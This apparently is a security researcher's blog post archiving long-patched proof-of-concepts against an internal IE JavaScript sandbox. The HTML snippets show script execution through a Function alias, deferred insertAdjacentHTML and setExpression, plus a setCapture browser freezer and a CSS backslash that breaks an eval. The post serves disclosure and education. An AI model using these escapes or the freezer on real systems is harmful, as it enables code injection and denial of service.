Sandbox LiveLabs: Script Execution, Freezers, and Style Parser Escapes

These proof-of-concepts were written to be pasted into the LiveLabs sandbox environment (an internal IE testing harness at http://131.107.155.233/Samples/genericSample.aspx). The sandbox was supposed to restrict what JavaScript could do, and these snippets probed the edges of those restrictions — finding several ways to execute code, freeze the browser, or break the containing page.

Script Execution via Function Constructor

Based on techniques by Gareth Heyes. The Function constructor alias lets you evaluate arbitrary code even when eval is restricted.

<html><head><title>PoC Based on Gareth PoCs</title>
</head>
<body>
This PoC is a simplification of all the AMAZING PoCs by Gareth
<script>
f = Function;
f('Object=function(){alert("Hacked: " + document.body.innerHTML)};')();
Object();
</script>
</body>
</html>

Script Execution via insertAdjacentHTML + defer

<html><head><title>Executes using insertAdjacentHTML</title></head>
<body>
<script>
document.body.insertAdjacentHTML('beforeBegin','.<script defer>alert(document.body.innerHTML)<\/script>');
</script>
</body>
</html>

<html><head><title>Changes the Location of the mainPage</title></head>
<body>
<a id="myLink" href = "http://www.google.com" target="_top">Google</a>

<script>
document.all.myLink.click();
</script>
</body>
</html>

Sandbox Freezer via setCapture

Once triggered, setCapture prevented any mouse interaction with the entire browser window, including other tabs, until focus was moved away from the browser.

<html><head><title>setCapture Freezes interaction with all Gadgets on the page</title></head>
<body>
The setCapture method freezes the browser window until you press the right mouse button or unfocus the browser window. <br />
That means, interfering with the usage of other Gadgets. If we add a setInterval to that... the Browser ends up being unusable. All the TABS.<br /><br />

<input type="button" value="Freeze Browser" onclick="freezeBrowser();"><br /><br />

<script>
function freezeBrowser()
{
	setInterval(function(){document.body.setCapture()},10)
}
</script>
</body>
</html>

Script Execution via setExpression

<html><head><title>Executes using setExpression</title></head>
<body>
<script>
document.body.setExpression("width","alert(document.body.innerHTML)");
</script>
</body>
</html>

Style Parser Error Leading to eval Injection

A backslash inside a <style> tag could break the CSS parser in a way that interfered with the sandbox’s internal eval-based style handling in GadgetManager.js.

<html>
<head><title>When placing a \ inside the style, it breaks the eval</title>
<style>A\</style>
</head>
<body>
The style tag with a \ inside will throw an error because the " ends up escaped.

Problem can be found in the GadgetManager.js, here:<br />
if(me.outCSS&&me.outCSS.length>0)eval("settings = { css : "+me.outCSS+" };");
</body>
</html>

Several of these techniques (the Function alias, insertAdjacentHTML with defer, and setExpression) provided paths to execute arbitrary JavaScript inside the sandbox. The setCapture freezer was a denial-of-service against the entire browser process. The style parser escape was application-specific — it exploited the gadget framework’s use of eval to process CSS strings — a good reminder that sandboxing needs to account for the application layer, not just the browser API surface.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [DoS: IE8 Crashes via createPopup and SCRIPT DEFER] :: [IE8 XSS Filter Bypass via META Redirect] >